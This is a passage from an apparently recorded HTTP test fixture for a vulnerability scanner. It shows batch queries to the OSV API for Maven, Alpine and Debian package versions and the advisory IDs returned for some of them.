"jakarta.activation:jakarta.activation-api" }, "version": "1.2.1" }, { "package": { "ecosystem": "Maven", "name": "jakarta.xml.bind:jakarta.xml.bind-api" }, "version": "2.3.2" }, { "package": { "ecosystem": "Maven", "name": "javax.servlet:javax.servlet-api" }, "version": "3.1.0" }, { "package": { "ecosystem": "Maven", "name": "javax.ws.rs:jsr311-api" }, "version": "1.1.1" }, { "package": { "ecosystem": "Maven", "name": "javax.xml.bind:jaxb-api" }, "version": "2.2.11" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libassuan" }, "version": "2.5.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "attr" }, "version": "2.5.2-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "bzip2" }, "version": "1.0.8-r6" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, "version": "3.3.2-r4" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "expat" }, "version": "2.6.4-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libffi" }, "version": "3.4.6-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libfontenc" }, "version": "1.1.8-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libgcrypt" }, "version": "1.10.3-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libgpg-error" }, "version": "1.51-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libidn2" }, "version": "2.3.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gettext" }, "version": "0.22.5-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libksba" }, "version": "1.6.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openldap" }, "version": "2.6.8-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ncurses" }, "version": "6.5_p20241006-r3" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libpng" }, "version": "1.6.44-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "cyrus-sasl" }, "version": "2.1.28-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, 
"version": "3.3.2-r4" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libtasn1" }, "version": "4.19.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libunistring" }, "version": "1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "mkfontscale" }, "version": "1.2.3-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl" }, "version": "1.2.5-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl-locales" }, "version": "0.1.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl-locales" }, "version": "0.1.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl" }, "version": "1.2.5-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ncurses" }, "version": "6.5_p20241006-r3" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "nettle" }, "version": "3.10-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "npth" }, "version": "1.6-r4" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, "version": "3.3.2-r4" }, { "package": { "ecosystem": "Maven", "name": "org.apache.avro:avro" }, "version": "1.9.2" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-compress" }, "version": "1.21" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-configuration2" }, "version": "2.8.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-math3" }, "version": "3.6.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-text" }, "version": "1.10.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-client" }, "version": "5.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-framework" }, "version": "5.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-recipes" }, "version": "5.2.0" }, { "package": { 
"ecosystem": "Maven", "name": "org.apache.hadoop.thirdparty:hadoop-shaded-guava" }, "version": "1.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop.thirdparty:hadoop-shaded-protobuf_3_21" }, "version": "1.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-annotations" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-auth" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-hdfs-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-core" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-jobclient" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-api" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.13" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.13" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-admin" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-client" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-common" }, "version": "2.0.3" }, { "package": { "ecosystem": 
"Maven", "name": "org.apache.kerby:kerb-core" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-crypto" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-identity" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-server" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-simplekdc" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-util" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-asn1" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-config" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-pkix" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-util" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-xdr" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:token-provider" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.codehaus.mojo:animal-sniffer-annotations" }, "version": "1.17" }, { "package": { "ecosystem": "Maven", "name": "org.codehaus.woodstox:stax2-api" }, "version": "4.2.1" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-api" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-client" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-common" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-client" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": 
"9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-security" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlet" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util-ajax" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-webapp" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-xml" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.jctools:jctools-core" }, "version": "3.1.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-builtins" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-reader" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-remote-ssh" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-remote-telnet" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-style" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal-jansi" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal-jna" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.slf4j:slf4j-api" }, "version": "1.7.36" }, { "package": { "ecosystem": "Maven", "name": "org.slf4j:slf4j-reload4j" }, "version": "1.7.36" }, { "package": { 
"ecosystem": "Alpine:v3.21", "name": "p11-kit" }, "version": "0.25.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "p11-kit" }, "version": "0.25.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "pinentry" }, "version": "1.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "pax-utils" }, "version": "1.3.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "skalibs" }, "version": "2.14.3.0-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "sqlite" }, "version": "3.47.1-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "tzdata" }, "version": "2024b-r1" }, { "package": { "ecosystem": "Maven", "name": "unknown:unknown" }, "version": "unknown" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "utmps" }, "version": "0.1.2.3-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "zlib" }, "version": "1.3.1-r2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_java_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 10135 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" }, { "id": "GHSA-wf8f-6423-gfxg", "modified": "2026-02-04T02:17:21.257294Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-735f-pc8j-v9w8", "modified": 
"2026-02-04T03:34:00.411610Z" } ] }, {}, { "vulns": [ { "id": "GHSA-gvpg-vgmx-xg6w", "modified": "2026-02-04T03:20:13.834799Z" }, { "id": "GHSA-xwmg-2g98-w7v9", "modified": "2026-02-04T04:02:18.737097Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-wxr5-93ph-8wr9", "modified": "2026-02-04T02:26:01.067608Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cfxw-4h78-h7fw", "modified": "2026-02-04T04:29:28.819325Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12243", "modified": "2026-02-24T08:30:42.520717Z" }, { "id": "ALPINE-CVE-2025-14831", "modified": "2026-02-24T08:30:41.701341Z" }, { "id": "ALPINE-CVE-2025-32988", "modified": "2026-02-24T08:16:54.971657Z" }, { "id": "ALPINE-CVE-2025-32989", "modified": "2026-02-24T08:17:41.640619Z" }, { "id": "ALPINE-CVE-2025-32990", "modified": "2026-02-24T08:17:41.697467Z" }, { "id": "ALPINE-CVE-2025-6395", "modified": "2026-02-24T08:17:38.778605Z" }, { "id": 
"ALPINE-CVE-2025-9820", "modified": "2026-02-24T08:17:41.731734Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-3p8m-j85q-pgmj", "modified": "2026-02-04T02:23:33.973208Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-5jpm-x58v-624v", "modified": "2026-02-04T02:17:39.757688Z" }, { "id": "GHSA-84h7-rjj3-6jx4", "modified": "2026-02-04T03:25:14.697311Z" }, { "id": "GHSA-fghv-69vj-qj49", "modified": "2026-02-04T03:04:04.888405Z" } ] }, { "vulns": [ { "id": "GHSA-prj3-ccx8-p6x4", "modified": "2026-02-04T02:26:22.855609Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-jq43-27x9-3v86", "modified": "2026-02-04T04:27:03.146166Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-389x-839f-4rhx", "modified": "2026-02-04T04:31:00.174857Z" }, { "id": "GHSA-xq3w-v528-46rv", "modified": "2026-02-04T03:40:54.362888Z" } ] }, { "vulns": [ { "id": "GHSA-4g8c-wm8x-jfhw", "modified": "2026-02-04T02:54:33.253775Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": 
"2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-8176", "modified": "2025-12-03T22:57:51.246966Z" }, { "id": "ALPINE-CVE-2025-59375", "modified": "2025-12-03T22:59:58.939558Z" }, { "id": "ALPINE-CVE-2026-24515", "modified": "2026-02-06T11:22:51.413545Z" }, { "id": "ALPINE-CVE-2026-25210", "modified": "2026-03-13T06:29:27.213127Z" }, { "id": "ALPINE-CVE-2026-32777", "modified": "2026-03-18T15:30:30.767674Z" }, { "id": "ALPINE-CVE-2026-32778", "modified": "2026-03-18T15:30:27.849300Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-64505", "modified": "2025-12-08T15:11:42.598503Z" }, { "id": "ALPINE-CVE-2025-64506", "modified": "2025-12-08T15:14:01.131553Z" }, { "id": "ALPINE-CVE-2025-64720", "modified": "2025-12-08T15:14:12.627370Z" }, { "id": "ALPINE-CVE-2025-65018", "modified": "2025-12-08T15:14:18.487828Z" }, { "id": "ALPINE-CVE-2025-66293", "modified": "2025-12-08T15:17:27.019257Z" }, { "id": 
"ALPINE-CVE-2026-22695", "modified": "2026-01-22T19:30:03.621725Z" }, { "id": "ALPINE-CVE-2026-22801", "modified": "2026-01-22T19:30:04.012462Z" }, { "id": "ALPINE-CVE-2026-25646", "modified": "2026-02-24T12:00:36.302208Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12133", "modified": "2025-12-03T22:55:00.302559Z" }, { "id": "ALPINE-CVE-2025-13151", "modified": "2026-01-13T09:30:10.551660Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": 
"ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "GHSA-r7pg-v2c8-mfg3", "modified": "2026-02-04T03:14:24.930542Z" }, { "id": "GHSA-rhrv-645h-fjfh", "modified": "2026-02-04T02:43:50.522457Z" } ] }, { "vulns": [ { "id": "GHSA-4265-ccf5-phj5", "modified": "2026-02-04T03:44:24.716817Z" }, { "id": "GHSA-4g9r-vxhx-9pgx", "modified": "2026-02-04T02:38:20.882397Z" } ] }, { "vulns": [ { "id": "GHSA-9w38-p64v-xpmv", "modified": "2026-02-04T03:05:15.000909Z" }, { "id": "GHSA-xjp4-hw94-mvp5", "modified": "2026-02-04T04:32:34.354092Z" } ] }, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, 
{}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-29087", "modified": "2025-11-19T06:21:22.290875Z" }, { "id": "ALPINE-CVE-2025-29088", "modified": "2025-11-19T06:21:22.419722Z" }, { "id": "ALPINE-CVE-2025-3277", "modified": "2025-11-19T06:21:22.993026Z" }, { "id": "ALPINE-CVE-2025-6965", "modified": "2026-02-05T02:19:39.445651Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {} ] } headers: Content-Length: - "10135" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 12957 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": 
"Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": 
"cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": "3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { 